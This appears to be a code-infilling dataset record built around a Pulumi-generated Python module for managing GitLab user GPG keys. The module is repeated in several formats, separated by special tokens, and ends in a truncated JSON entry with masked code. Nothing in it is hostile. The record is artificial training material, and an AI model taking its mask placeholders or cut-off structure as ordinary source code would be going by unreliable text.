pulumi.set(self, 'key_id', value)
@property
@pulumi.getter(name='userId')
def user_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, 'user_id', value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:
Optional[pulumi.ResourceOptions]=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,
pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.
__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.
get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError(
'Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError(
'__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'
)
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__['key'] = key
__props__.__dict__['user_id'] = user_id
__props__.__dict__['created_at'] = None
__props__.__dict__['key_id'] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,
opts)
@staticmethod
def get(resource_name: str, id: pulumi.Input[str], opts: Optional[
pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str
]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[
pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None
) ->'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)
)
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__['created_at'] = created_at
__props__.__dict__['key'] = key
__props__.__dict__['key_id'] = key_id
__props__.__dict__['user_id'] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@property
@pulumi.getter
def key(self) ->pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@property
@pulumi.getter(name='keyId')
def key_id(self) ->pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@property
@pulumi.getter(name='userId')
def user_id(self) ->pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pulumi.input_type
class UserGpgKeyArgs:
def __init__(__self__, *, key: pulumi.Input[str], user_id: Optional[
pulumi.Input[int]]=None):
"""
The set of arguments for constructing a UserGpgKey resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
pulumi.set(__self__, 'key', key)
if user_id is not None:
pulumi.set(__self__, 'user_id', user_id)
@property
@pulumi.getter
def key(self) ->pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, 'key', value)
@property
@pulumi.getter(name='userId')
def user_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, 'user_id', value)
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,
key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.
Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, 'created_at', created_at)
if key is not None:
pulumi.set(__self__, 'key', key)
if key_id is not None:
pulumi.set(__self__, 'key_id', key_id)
if user_id is not None:
pulumi.set(__self__, 'user_id', user_id)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'created_at', value)
@property
@pulumi.getter
def key(self) ->Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'key', value)
@property
@pulumi.getter(name='keyId')
def key_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, 'key_id', value)
@property
@pulumi.getter(name='userId')
def user_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, 'user_id', value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:
Optional[pulumi.ResourceOptions]=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,
pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.
__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.
get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError(
'Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError(
'__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'
)
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__['key'] = key
__props__.__dict__['user_id'] = user_id
__props__.__dict__['created_at'] = None
__props__.__dict__['key_id'] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,
opts)
@staticmethod
def get(resource_name: str, id: pulumi.Input[str], opts: Optional[
pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str
]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[
pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None
) ->'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)
)
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__['created_at'] = created_at
__props__.__dict__['key'] = key
__props__.__dict__['key_id'] = key_id
__props__.__dict__['user_id'] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@property
@pulumi.getter
def key(self) ->pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@property
@pulumi.getter(name='keyId')
def key_id(self) ->pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@property
@pulumi.getter(name='userId')
def user_id(self) ->pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
<|reserved_special_token_1|>
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['UserGpgKeyArgs', 'UserGpgKey']
@pulumi.input_type
class UserGpgKeyArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a UserGpgKey resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
pulumi.set(__self__, "key", key)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if key is not None:
pulumi.set(__self__, "key", key)
if key_id is not None:
pulumi.set(__self__, "key_id", key_id)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyId")
def key_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_id", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: UserGpgKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["user_id"] = user_id
__props__.__dict__["created_at"] = None
__props__.__dict__["key_id"] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__["created_at"] = created_at
__props__.__dict__["key"] = key
__props__.__dict__["key_id"] = key_id
__props__.__dict__["user_id"] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="keyId")
def key_id(self) -> pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
|
flexible
|
{
"blob_id": "aa79d5cbe656979bf9c228f6a576f2bbf7e405ca",
"index": 2950,
"step-1": "<mask token>\n\n\[email protected]_type\nclass _UserGpgKeyState:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserGpgKey(pulumi.CustomResource):\n\n @overload\n def __init__(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n\n @overload\n def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:\n Optional[pulumi.ResourceOptions]=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n 